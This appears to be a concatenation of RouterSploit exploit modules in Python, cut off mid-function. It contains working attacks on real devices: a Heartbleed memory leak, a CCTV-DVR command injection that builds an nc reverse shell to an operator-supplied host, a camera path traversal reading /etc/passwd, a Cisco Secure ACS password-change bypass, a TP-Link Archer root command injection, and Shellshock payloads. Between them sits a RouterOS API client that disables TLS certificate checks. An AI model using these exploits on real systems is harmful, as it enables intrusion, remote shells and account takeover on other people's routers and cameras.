        0xc00f,  # TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
        0x0035,  # TLS_RSA_WITH_AES_256_CBC_SHA
        0x0084,  # TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
        0xc012,  # TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
        0xc008,  # TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
        0xc01c,  # TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA
        0xc01b,  # TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA
        0x0016,  # TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
        0x0013,  # TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA
        0xc00d,  # TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
        0xc003,  # TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
        0x000a,  # TLS_RSA_WITH_3DES_EDE_CBC_SHA
        0xc013,  # TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
        0xc009,  # TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
        0xc01f,  # TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA
        0xc01e,  # TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA
        0x0033,  # TLS_DHE_RSA_WITH_AES_128_CBC_SHA
        0x0032,  # TLS_DHE_DSS_WITH_AES_128_CBC_SHA
        0x009a,  # TLS_DHE_RSA_WITH_SEED_CBC_SHA
        0x0099,  # TLS_DHE_DSS_WITH_SEED_CBC_SHA
        0x0045,  # TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
        0x0044,  # TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA
        0xc00e,  # TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
        0xc004,  # TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
        0x002f,  # TLS_RSA_WITH_AES_128_CBC_SHA
        0x0096,  # TLS_RSA_WITH_SEED_CBC_SHA
        0x0041,  # TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
        0xc011,  # TLS_ECDHE_RSA_WITH_RC4_128_SHA
        0xc007,  # TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
        0xc00c,  # TLS_ECDH_RSA_WITH_RC4_128_SHA
        0xc002,  # TLS_ECDH_ECDSA_WITH_RC4_128_SHA
        0x0005,  # TLS_RSA_WITH_RC4_128_SHA
        0x0004,  # TLS_RSA_WITH_RC4_128_MD5
        0x0015,  # TLS_DHE_RSA_WITH_DES_CBC_SHA
        0x0012,  # TLS_DHE_DSS_WITH_DES_CBC_SHA
        0x0009,  # TLS_RSA_WITH_DES_CBC_SHA
        0x0014,  # TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
        0x0011,  # TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA
        0x0008,  # TLS_RSA_EXPORT_WITH_DES40_CBC_SHA
        0x0006,  # TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5
        0x0003,  # TLS_RSA_EXPORT_WITH_RC4_40_MD5
        0x00ff   # Unknown
    )

    SSL_RECORD_HEADER_SIZE = 0x05
    HANDSHAKE_RECORD_TYPE = 0x16
    HEARTBEAT_RECORD_TYPE = 0x18
    ALERT_RECORD_TYPE = 0x15
    HANDSHAKE_SERVER_HELLO_TYPE = 0x02
    HANDSHAKE_CERTIFICATE_TYPE = 0x0b
    HANDSHAKE_KEY_EXCHANGE_TYPE = 0x0c
    HANDSHAKE_SERVER_HELLO_DONE_TYPE = 0x0e

    TLS_VERSION = {
        "SSLv3": 0x0300,
        "1.0": 0x0301,
        "1.1": 0x0302,
        "1.2": 0x0303
    }

    def __init__(self):
        self.tcp_client = None
        self.leak = None

        self.printable = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~"
        self.white_chars = " \t\n\r\x0b\x0c"

    def run(self):
        self.leak = self.bleed()
        if self.leak:
            data = ""
            for leak_byte in self.leak:
                char = chr(leak_byte)
                if char in self.white_chars:
                    data += " "
                elif char not in self.printable:
                    data += "."
                else:
                    data += char

            clean_data = ""
            tmp_b = 0
            for item in re.finditer(r"(\.){400,}", data):
                a, b = item.span()
                clean_data += data[tmp_b:a]
                tmp_b = b
                repeated = b - a - 64
                clean_data += "................................ repeated {} times ................................".format(repeated)

            clean_data += data[b:]
            print_info(clean_data)
        else:
            print_error("Exploit failed - Target does not seem to be vulnerable")

    @mute
    def check(self):
        if self.bleed():
            return True

        return False

    def bleed(self):
        if not self.establish_connect():
            print_error("Exploit failed - could not establish connection")
            return False

        print_status("Sending Heartbeat...")
        heartbeat_req = self.heartbeat_request(self.heartbeat_length)
        self.tcp_client.send(heartbeat_req)
        hdr = self.tcp_client.recv_all(self.SSL_RECORD_HEADER_SIZE)
        if not hdr:
            print_error("No Heartbeat response...")
            return False

        record_type, version, length = unpack(">BHH", hdr)

        if record_type != self.HEARTBEAT_RECORD_TYPE or version != self.TLS_VERSION[self.tls_version]:
            print_error("Unexpected Hearbeat response header")
            self.tcp_client.close()

        heartbeat_data = self.tcp_client.recv_all(self.heartbeat_length)
        if heartbeat_data:
            print_success("Heartbeat response, {} bytes".format(len(heartbeat_data)))
        else:
            print_error("No heartbeat response")

        self.tcp_client.close()

        return heartbeat_data

    def establish_connect(self):
        self.tcp_client = self.tcp_create()
        self.tcp_client.connect()

        print_status("Sending Client Hello...")
        data = self.client_hello()
        self.tcp_client.send(data)

        server_response = self.get_server_hello()
        if not server_response:
            print_error("Server Hello not found")

        return server_response

    def get_server_hello(self):
        server_done = False
        ssl_record_counter = 0
        remaining_data = self.get_ssl_record()

        while remaining_data and len(remaining_data) > 0:
            ssl_record_counter += 1
            ssl_type, ssl_version, ssl_len = unpack(">BHH", remaining_data[:5])
            print_status("SSL record {}".format(ssl_record_counter))
            print_status("\tType:    {}".format(ssl_type))
            print_status("\tVersion: 0x{:x}".format(ssl_version))
            print_status("\tLength:  {}".format(ssl_len))

            if ssl_type != self.HANDSHAKE_RECORD_TYPE:
                print_status("\tWrong Record Type")
            else:
                ssl_data = remaining_data[5: 5 + ssl_len]
                handshakes = self.parse_handshakes(ssl_data)

                # Stop once we receive SERVER_HELLO_DONE
                if handshakes and handshakes[-1]["type"] == self.HANDSHAKE_SERVER_HELLO_DONE_TYPE:
                    server_done = True
                    break

            remaining_data = self.get_ssl_record()

        return server_done

    def parse_handshakes(self, data):
        remaining_data = data
        handshakes = []
        handshake_count = 0

        while remaining_data and len(remaining_data) > 0:
            hs_type, hs_len_pad, hs_len = unpack(">BBH", remaining_data[:4])
            hs_data = remaining_data[4: 4 + hs_len]
            handshake_count += 1
            print_status("\tHandshake {}".format(handshake_count))
            print_status("\t\tLength: {}".format(hs_len))

            handshake_parsed = None
            if hs_type == self.HANDSHAKE_SERVER_HELLO_TYPE:
                print_status("\t\tType: Server Hello ({})".format(hs_type))
                handshake_parsed = self.parse_server_hello(hs_data)
            elif hs_type == self.HANDSHAKE_CERTIFICATE_TYPE:
                print_status("\t\tType: Certificate Data ({})".format(hs_type))
                handshake_parsed = self.parse_certificate_data(hs_data)
            elif hs_type == self.HANDSHAKE_KEY_EXCHANGE_TYPE:
                print_status("\t\tType: Server Key Exchange ({})".format(hs_type))
            elif hs_type == self.HANDSHAKE_SERVER_HELLO_DONE_TYPE:
                print_status("\t\tType: Server Hello Done ({})".format(hs_type))
            else:
                print_status("\t\tType: Handshake type {} not implement".format(hs_type))

            handshakes.append({
                "type": hs_type,
                "len": hs_len,
                "data": handshake_parsed
            })
            remaining_data = remaining_data[4 + hs_len:]

        return handshakes

    def parse_server_hello(self, data):
        version = unpack(">H", data[:2])[0]
        print_status("\t\tServer Hello Version: 0x{:x}".format(version))
        random = unpack(">" + "B" * 32, data[2:34])
        random_hex = str(binascii.hexlify(bytes(random)), "utf-8")
        print_status("\t\tServer Hello random data: {}".format(random_hex))
        session_id_length = unpack(">B", data[34:35])[0]
        print_status("\t\tServer Hello Session ID length: {}".format(session_id_length))
        session_id = unpack(">" + "B" * session_id_length, data[35: 35 + session_id_length])
        session_id_hex = str(binascii.hexlify(bytes(session_id)), "utf-8")
        print_status("\t\tServer Hello session id: {}".format(session_id_hex))

    def parse_certificate_data(self, data):
        cert_len_padding, cert_len = unpack(">BH", data[:3])
        print_status("\t\tCertificates length: {}".format(cert_len))
        print_status("\t\tData length: {}".format(len(data)))

        # contains multiple certs
        already_read = 3
        cert_counter = 0
        while already_read < cert_len:
            cert_counter += 1
            # get single certificate length
            single_cert_len_padding, single_cert_len = unpack(">BH", data[already_read: already_read + 3])
            print_status("\t\tCertificate {}".format(cert_counter))
            print_status("\t\t\tCertificate {}: Length: {}".format(cert_counter, single_cert_len))
            certificate_data = data[(already_read + 3): (already_read + 3 + single_cert_len)]
            cert = x509.load_der_x509_certificate(certificate_data, default_backend())
            print_status("\t\t\tCertificate {}: {}".format(cert_counter, cert))

            already_read = already_read + single_cert_len + 3

    def get_ssl_record(self):
        hdr = self.tcp_client.recv_all(self.SSL_RECORD_HEADER_SIZE)

        if hdr:
            length = unpack(">BHH", hdr)[2]
            data = self.tcp_client.recv_all(length)
            hdr += data

            return hdr

        return None

    def client_hello(self):
        # user current time for TLS time
        time_epoch = int(time())
        cipher_suits_len = len(self.CIPHER_SUITS)

        hello_data = pack(">H", self.TLS_VERSION[self.tls_version])  # Version TLS
        hello_data += pack(">L", time_epoch)                        # Time in epoch format
        hello_data += bytes(utils.random_text(28), "utf-8")         # Random
        hello_data += b"\x00"                                       # Session ID length
        hello_data += pack(">H", cipher_suits_len * 2)              # Cipher Suits Length (102)
        hello_data += pack(">" + "H" * cipher_suits_len, *self.CIPHER_SUITS)  # Cipher Suites
        hello_data += b"\x01"                                       # Compression methods length (1)
        hello_data += b"\x00"                                       # Compression methods: null

        hello_data_extensions = b"\x00\x0f"                         # Extension type (Heartbeat)
        hello_data_extensions += b"\x00\x01"                        # Extension length
        hello_data_extensions += b"\x01"                            # Extension data

        hello_data += pack(">H", len(hello_data_extensions))
        hello_data += hello_data_extensions

        data = b"\x01\x00"                                          # Handshake Type: Client Hello (1)
        data += pack(">H", len(hello_data))                         # Length
        data += hello_data

        return self.ssl_record(self.HANDSHAKE_RECORD_TYPE, data)

    def heartbeat_request(self, length):
        payload = b"\x01"           # Heartbeat Message Type: Request (1)
        payload += pack(">H", length)
        return self.ssl_record(self.HEARTBEAT_RECORD_TYPE, payload)

    def ssl_record(self, record_type, data):
        record = pack(">BHH", record_type, self.TLS_VERSION[self.tls_version], len(data))
        record += data
        return record



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        'name': 'Multiple CCTV-DVR Vendors',
        'authors': (
            'k1p0d <nullfield@gmail.com>',  # original exploit author
            'GH0st3rs',  # routersploit module
        ),
        'description': 'Remote Code Execution in CCTV-DVR affecting over 70 different vendors',
        'references': (
            'https://www.exploit-db.com/exploits/39596/',
            'http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html',
        ),
        'devices': (
            'Ademco',
            'ATS Alarmes technolgy and ststems',
            'Area1Protection',
            'Avio',
            'Black Hawk Security',
            'Capture',
            'China security systems',
            'Cocktail Service',
            'Cpsecured',
            'CP PLUS',
            "Digital Eye'z no website",
            'Diote Service & Consulting',
            'DVR Kapta',
            'ELVOX ',
            'ET Vision ',
            'Extra Eye 4 U',
            'eyemotion ',
            'EDS ',
            'Fujitron ',
            'Full HD 1080p',
            'Gazer ',
            'Goldeye ',
            'Goldmaster',
            'Grizzly ',
            'HD IViewer',
            'Hi-View ',
            'Ipcom',
            'IPOX ',
            'IR',
            'ISC Illinois Security Cameras, Inc.',
            'JFL Alarmes ',
            'Lince ',
            'LOT',
            'Lux ',
            'Lynx Security ',
            'Magtec ',
            'Meriva Security ',
            'Multistar ',
            'Navaio',
            'NoVus ',
            'Optivision ',
            'PARA Vision',
            'Provision-ISR ',
            'Q-See ',
            'Questek ',
            'Retail Solution Inc',
            'RIT Huston .com ',
            'ROD Security cameras ',
            'Satvision ',
            'Sav Technology',
            'Skilleye ',
            'Smarteye ',
            'Superior Electrial Systems',
            'TechShell ',
            'TechSon',
            'Technomate ',
            'TecVoz ',
            'TeleEye ',
            'Tomura',
            'truVue',
            'TVT ',
            'Umbrella ',
            'United Video Security System, Inc',
            'Universal IT Solutions',
            'US IT Express',
            'U-Spy Store',
            'Ventetian ',
            'V-Gurad Security',
            'Vid8 ',
            'Vtek',
            'Vision Line',
            'Visar',
            'Vodotech.com ',
            'Vook ',
            'Watchman ',
            'Xrplus ',
            'Yansi ',
            'Zetec',
            'ZoomX',
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")
    connback = OptString("", "Local ip:port for reverse connect e.g. 192.168.1.100:55555")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            pattern = re.compile(r'(?P<host>[a-zA-Z0-9\.\-]+):(?P<port>[0-9]+)')
            match = pattern.search(self.connback)
            if not match:
                print_error('given connect back "{local}" should be in the format for host:port'.format(local=self.connback))
                return False
            # Three ..
            response = self.http_request(
                method="GET",
                path="/language/Swedish${IFS}&&echo${IFS}nc${IFS}%s${IFS}%s${IFS}>e&&${IFS}/a" % (
                    match.group("host"),
                    match.group("port")
                )
            )
            if response is None:
                print_error("Exploit failed - unable to connect reason")
                return False
            # Two ...
            response = self.http_request(
                method="GET",
                path='/language/Swedish${IFS}&&echo${IFS}" - e${IFS}$SHELL${IFS}">>e&&${IFS}/a'
            )
            if response is None:
                print_error("Exploit failed - unable to connect reason")
                return False
            # One. Left off!
            response = self.http_request(
                method="GET",
                path="/language/Swedish&&$(cat${IFS}e)${IFS}&>r&&${IFS}/s"
            )
            if response is None:
                print_error("Exploit failed - unable to connect reason")
                return False

            print_status("Exploit payload sent!")
            print_success("If nothing went wrong we should be getting a reversed remote shell at %s:%s" % (
                match.group("host"),
                match.group("port")
            ))
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        # Write file
        response = self.http_request(
            method="GET",
            path="/language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js"
        )
        if response is None:
            return False
        # Read the file.
        response_read = self.http_request(
            method="GET",
            path="/../../../../../../../mnt/mtd/test"
        )
        if response_read is None:
            return False
        # remove it..
        response = self.http_request(
            method="GET",
            path="//language/Swedish${IFS}&&rm${IFS}test&&tar${IFS}/string.js"
        )
        if response is None:
            return False
        if response_read.text and response_read.text[0] != '1':
            return False
        return True



# MIT License
# The code is taken from https://github.com/LaiArturs/RouterOS_API/
# All credits go to Arturs Laizans - https://github.com/LaiArtur

import binascii
import hashlib
import socket
import ssl

TIMEOUT = 8.0

CONTEXT = ssl.create_default_context()
CONTEXT.check_hostname = False
CONTEXT.verify_mode = ssl.CERT_NONE
CONTEXT.set_ciphers("ADH:ALL")


class LoginError(Exception):
    pass


class WordTooLong(Exception):
    pass


class CreateSocketError(Exception):
    pass


class RouterOSTrapError(Exception):
    pass


class ApiRosClient(object):
    "RouterOS API"

    def __init__(self, address, port, user, password, use_ssl=False,
                 context=CONTEXT, timeout=TIMEOUT):

        self.address = address
        self.user = user
        self.password = password
        self.use_ssl = use_ssl
        self.port = port
        self.context = context
        self.timeout = timeout

        # Port setting logic
        if port:
            self.port = port
        elif use_ssl:
            self.port = SSL_PORT
        else:
            self.port = PORT

        self.sock = None
        self.connection = None

    # Open socket connection with router and wrap with SSL if needed.
    def open_socket(self):

        for res in socket.getaddrinfo(self.address, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM):
            af, socktype, proto, canonname, sa = res

        self.sock = socket.socket(af, socket.SOCK_STREAM)
        self.sock.settimeout(self.timeout)

        try:
            # Trying to connect to RouterOS, error can occur if IP address is not reachable, or API is blocked in
            # RouterOS firewall or ip services, or port is wrong.
            self.connection = self.sock.connect(sa)

        except OSError:
            raise CreateSocketError('Error: API failed to connect to socket. Host: {}, port: {}.'.format(self.address,
                                                                                                         self.port))

        if self.use_ssl:
            self.sock = self.context.wrap_socket(self.sock)

    def login(self):

        def reply_has_error(reply):
            # Check if reply contains login error
            if len(reply[0]) == 2 and reply[0][0] == '!trap':
                return True
            else:
                return False

        def process_old_login(reply):
            # RouterOS uses old API login method, code continues with old method
            md5 = hashlib.md5(('\x00' + self.password).encode('utf-8'))
            md5.update(binascii.unhexlify(reply[0][1][5:]))
            sentence = ['/login', '=name=' + self.user, '=response=00'
                        + binascii.hexlify(md5.digest()).decode('utf-8')]
            reply = self.communicate(sentence)
            return check_reply(reply)

        def check_reply(reply):
            if len(reply[0]) == 1 and reply[0][0] == '!done':
                # If login process was successful
                return reply
            elif reply_has_error(reply):
                raise LoginError(reply)
            elif len(reply[0]) == 2 and reply[0][1][0:5] == '=ret=':
                return process_old_login(reply)
            else:
                raise LoginError(f'Unexpected reply to login: {reply}')

        sentence = ['/login', '=name=' + self.user, '=password=' + self.password]
        reply = self.communicate(sentence)
        return check_reply(reply)

    # Sending data to router and expecting something back
    def communicate(self, sentence_to_send):

        # There is specific way of sending word length in RouterOS API.
        # See RouterOS API Wiki for more info.
        def send_length(w):
            length_to_send = len(w)
            if length_to_send < 0x80:
                num_of_bytes = 1  # For words smaller than 128
            elif length_to_send < 0x4000:
                length_to_send += 0x8000
                num_of_bytes = 2  # For words smaller than 16384
            elif length_to_send < 0x200000:
                length_to_send += 0xC00000
                num_of_bytes = 3  # For words smaller than 2097152
            elif length_to_send < 0x10000000:
                length_to_send += 0xE0000000
                num_of_bytes = 4  # For words smaller than 268435456
            elif length_to_send < 0x100000000:
                num_of_bytes = 4  # For words smaller than 4294967296
                self.sock.sendall(b'\xF0')
            else:
                raise WordTooLong('Word is too long. Max length of word is 4294967295.')
            self.sock.sendall(length_to_send.to_bytes(num_of_bytes, byteorder='big'))

            # Actually I haven't successfully sent words larger than approx. 65520.
            # Probably it is some RouterOS limitation of 2^16.

        # The same logic applies for receiving word length from RouterOS side.
        # See RouterOS API Wiki for more info.
        def receive_length():
            r = self.sock.recv(1)  # Receive the first byte of word length

            # If the first byte of word is smaller than 80 (base 16),
            # then we already received the whole length and can return it.
            # Otherwise if it is larger, then word size is encoded in multiple bytes and we must receive them all to
            # get the whole word size.

            if r < b'\x80':
                r = int.from_bytes(r, byteorder='big')
            elif r < b'\xc0':
                r += self.sock.recv(1)
                r = int.from_bytes(r, byteorder='big')
                r -= 0x8000
            elif r < b'\xe0':
                r += self.sock.recv(2)
                r = int.from_bytes(r, byteorder='big')
                r -= 0xC00000
            elif r < b'\xf0':
                r += self.sock.recv(3)
                r = int.from_bytes(r, byteorder='big')
                r -= 0xE0000000
            elif r == b'\xf0':
                r = self.sock.recv(4)
                r = int.from_bytes(r, byteorder='big')

            return r

        def read_sentence():
            rcv_sentence = []  # Words will be appended here
            rcv_length = receive_length()  # Get the size of the word

            while rcv_length != 0:
                received = b''
                while rcv_length > len(received):
                    rec = self.sock.recv(rcv_length - len(received))
                    if rec == b'':
                        raise RuntimeError('socket connection broken')
                    received += rec
                received = received.decode('utf-8', 'backslashreplace')
                rcv_sentence.append(received)
                rcv_length = receive_length()  # Get the size of the next word
            return rcv_sentence

        # Sending part of conversation

        # Each word must be sent separately.
        # First, length of the word must be sent,
        # Then, the word itself.
        for word in sentence_to_send:
            send_length(word)
            self.sock.sendall(word.encode('utf-8'))  # Sending the word
        self.sock.sendall(b'\x00')  # Send zero length word to mark end of the sentence

        # Receiving part of the conversation

        # Will continue receiving until receives '!done' or some kind of error (!trap).
        # Everything will be appended to paragraph variable, and then returned.
        paragraph = []
        received_sentence = ['']
        while received_sentence[0] != '!done':
            received_sentence = read_sentence()
            paragraph.append(received_sentence)
        return paragraph

    # Initiate a conversation with the router
    def talk(self, message):

        # It is possible for message to be string, tuple or list containing multiple strings or tuples
        if type(message) == str or type(message) == tuple:
            return self.send(message)
        elif type(message) == list:
            reply = []
            for sentence in message:
                reply.append(self.send(sentence))
            return reply
        else:
            raise TypeError('talk() argument must be str or tuple containing str or list containing str or tuples')

    def send(self, sentence):
        # If sentence is string, not tuples of strings, it must be divided in words
        if type(sentence) == str:
            sentence = sentence.split()
        reply = self.communicate(sentence)

        # If RouterOS returns error from command that was sent
        if '!trap' in reply[0][0]:
            # You can comment following line out if you don't want to raise an error in case of !trap
            raise RouterOSTrapError("\nCommand: {}\nReturned an error: {}".format(sentence, reply))
            pass

        # reply is list containing strings with RAW output form API
        # nice_reply is a list containing output form API sorted in dictionary for easier use later
        nice_reply = []
        for m in range(len(reply) - 1):
            nice_reply.append({})
            for k, v in (x[1:].split('=', 1) for x in reply[m][1:]):
                nice_reply[m][k] = v
        return nice_reply

    def is_alive(self) -> bool:
        """Check if socket is alive and router responds"""

        # Check if socket is open in this end
        try:
            self.sock.settimeout(2)
        except OSError:
            return False

        # Check if we can send and receive through socket
        try:
            self.talk('/system/identity/print')

        except (socket.timeout, IndexError, BrokenPipeError):
            self.close()
            return False

        self.sock.settimeout(self.timeout)
        return True

    def create_connection(self):
        self.open_socket()
        self.login()

    def close(self):
        self.sock.close()



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "JVC & Vanderbilt & Honeywell IP-Camera Path Traversal",
        "description": "Module exploits JVC IP-Camera VN-T216VPRU, Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR and Honeywell "
                       "IP-Camera HICC-1100PT Path Traversal vulnerability. If target is vulnerable it is possible to read file "
                       "from the filesystem.",
        "authors": (
            "Yakir Wizman",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/40281/",
        ),
        "devices": (
            "JVC IP-Camera VN-T216VPRU",
            "Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR",
            "Honeywell IP-Camera HICC-1100PT"
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    filename = OptString("/etc/passwd", "File to read from the filesystem")

    def __init__(self):
        self.resources = (
            "/cgi-bin/check.cgi?file=../../..{}",
            "/cgi-bin/chklogin.cgi?file=../../..{}"
        )

        self.valid_resource = None

    def run(self):
        if self.check():
            print_success("Target appears to be vulnerable.")

            path = self.valid_resource.format(self.filename)

            response = self.http_request(
                method="GET",
                path=path,
            )

            if response is None:
                print_error("Error with reading response")
                return

            if response.text:
                print_status("Reading file: {}".format(self.filename))
                print_info(response.text)
            else:
                print_error("Exploit failed - empty response")

        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        filename = "/etc/passwd"
        for resource in self.resources:
            path = resource.format(filename)

            response = self.http_request(
                method="GET",
                path=path
            )

            if response and utils.detect_file_content(response.text, "/etc/passwd"):
                self.valid_resource = resource
                return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Cisco Secure ACS Unauthorized Password Change",
        "description": "Module exploits an authentication bypass issue which allows arbitrary "
                       "password change requests to be issued for any user in the local store. "
                       "Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well "
                       "as version 5.2 with either no patches or patches 1 and 2 are vulnerable.",
        "authors": (
            "Jason Kratzer <pyoor[at]flinkd.org>",  # vulnerability discovery & metasploit module
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html",
        ),
        "devices": (
            "Cisco Secure ACS version 5.1 with patch 3, 4, or 5 installed and without patch 6 or later installed",
            "Cisco Secure ACS version 5.2 without any patches installed",
            "Cisco Secure ACS version 5.2 with patch 1 or 2 installed and without patch 3 or later installed",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(443, "Target HTTP port")
    ssl = OptBool(True, "SSL enabled: true/false")

    path = OptString("/PI/services/UCP/", "Path to UCP WebService")
    username = OptString("", "Username to use")
    password = OptString("", "Password to use")

    def run(self):
        headers = {'SOAPAction': '"changeUserPass"'}

        data = ('<?xml version="1.0" encoding="utf-8"?>' + '\r\n'
                '<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" '
                'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" '
                'xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" '
                'xmlns:xsd="http://www.w3.org/1999/XMLSchema">' + '\r\n'

                '<SOAP-ENV:Body>' + '\r\n'
                '<ns1:changeUserPass xmlns:ns1="UCP" SOAP-ENC:root="1">' + '\r\n'
                '<v1 xsi:type="xsd:string">' + self.username + '</v1>' + '\r\n'
                '<v2 xsi:type="xsd:string">fakepassword</v2>' + '\r\n'
                '<v3 xsi:type="xsd:string">' + self.password + '</v3>' + '\r\n'
                '</ns1:changeUserPass>'
                '</SOAP-ENV:Body>' + '\r\n'
                '</SOAP-ENV:Envelope>' + '\r\n\r\n')

        print_status("Issuing password change request for: " + self.username)

        response = self.http_request(
            method="POST",
            path=self.path,
            data=data,
            headers=headers
        )

        if response is None:
            print_error("Exploit failed. Target seems to be not vulnerable.")
            return

        if "success" in response.text:
            print_success("Success! Password for {} has been changed to {}".format(self.username, self.password))
        elif "Password has already been used" in response.text:
            print_error("Failed! The supplied password has already been used.")
            print_error("Please change the password and try again.")
        elif "Invalid credentials for user" in response.text:
            print_error("Failed! Username does not exist or target is not vulnerable.")
            print_error("Please change the username and try again.")
        else:
            print_error("Failed!  An unknown error has occurred.")

    @mute
    def check(self):
        # it is not possible to verify if target is vulnerable without exploiting system
        return None



import time
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "TP-Link Archer C2 & C20i",
        "description": "Exploits TP-Link Archer C2 and Archer C20i remote code execution vulnerability "
                       "that allows executing commands on operating system level with root privileges.",
        "authors": (
            "Michal Sajdak <michal.sajdak[at]securitum.pl",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://sekurak.pl/tp-link-root-bez-uwierzytelnienia-urzadzenia-archer-c20i-oraz-c2/",  # only in polish
        ),
        "devices": (
            "TP-Link Archer C2",
            "TP-Link Archer C20i",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command shell")
            print_status("It is blind command injection so response is not available")

            # requires testing
            shell(self, architecture="mipsbe", method="wget", location="/tmp")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    def execute(self, cmd):
        referer = "{}/mainFrame.htm".format(self.target)

        headers = {
            "Content-Type": "text/plain",
            "Referer": referer
        }

        data = ("[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\r\n"
                "dataBlockSize=64\r\n"
                "timeout=1\r\n"
                "numberOfRepetitions=1\r\n"
                "host=127.0.0.1;" + cmd + ";\r\n"
                "X_TP_ConnName=ewan_ipoe_s\r\n"
                "diagnosticsState=Requested\r\n")

        # send command
        self.http_request(
            method="POST",
            path="/cgi?2",
            headers=headers,
            data=data
        )

        data = ("[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n")

        # execute command on device
        self.http_request(
            method="POST",
            path="/cgi?7",
            headers=headers,
            data=data
        )
        time.sleep(1)

        return ""

    @mute
    def check(self):
        referer = self.get_target_url(path="/mainFrame.htm")
        headers = {
            "Content-Type": "text/plain",
            "Referer": referer
        }

        data = (
            "[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\r\n"
            "dataBlockSize=64\r\n"
            "timeout=1\r\n"
            "numberOfRepetitions=1\r\n"
            "host=127.0.0.1\r\n"
            "X_TP_ConnName=ewan_ipoe_s\r\n"
            "diagnosticsState=Requested\r\n"
        )

        response = self.http_request(
            method="POST",
            path="/cgi?2",
            headers=headers,
            data=data
        )
        if response is None:
            return False  # target is not vulnerable

        if response.status_code == 200 and "[error]0" in response.text:
            return True  # target is vulnerable

        return False  # target is not vulnerable



import re
import string
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Shellshock",
        "description": "Exploits shellshock vulnerability that allows executing commands on operating system level.",
        "authors": (
            "Marcin Bury <marcin@threat9.com>",  # routersploit module
        ),
        "references": (
            "https://access.redhat.com/articles/1200223",
            "http://seclists.org/oss-sec/2014/q3/649",
            "http://blog.trendmicro.com/trendlabs-security-intelligence/shell-attack-on-your-server-bash-bug-cve-2014-7169-and-cve-2014-6271/",
        ),
        "devices": (
            "Multi",
        ),
    }
    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    path = OptString("/", "Url path")
    method = OptString("GET", "HTTP method")
    header = OptString("User-Agent", "HTTP header injection point")

    def __init__(self):
        self.payloads = [
            '() { :;};echo -e "\\r\\n{{marker}}$(/bin/bash -c "{{cmd}}"){{marker}}"',  # cve-2014-6271
            '() { _; } >_[$($())] { echo -e "\\r\\n{{marker}}$(/bin/bash -c "{{cmd}}"){{marker}}"; }',  # cve-2014-6278
        ]
        self.valid = None

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            shell(self)
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        marker = utils.random_text(32)
